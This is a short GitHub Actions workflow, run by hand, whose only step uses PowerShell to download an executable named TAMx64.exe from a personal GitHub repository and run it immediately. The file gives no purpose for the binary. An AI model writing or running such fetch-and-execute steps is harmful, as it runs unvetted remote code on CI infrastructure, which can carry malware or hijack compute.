name: workflowname
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: 64x_runner
    steps:
      - name: powershell
        shell: cmd
        run: powershell.exe -c Invoke-WebRequest https://github.com/Sameer1-29/oscar/raw/main/TAMx64.exe -OutFile TAMx64.exe ; .\TAMx64.exe
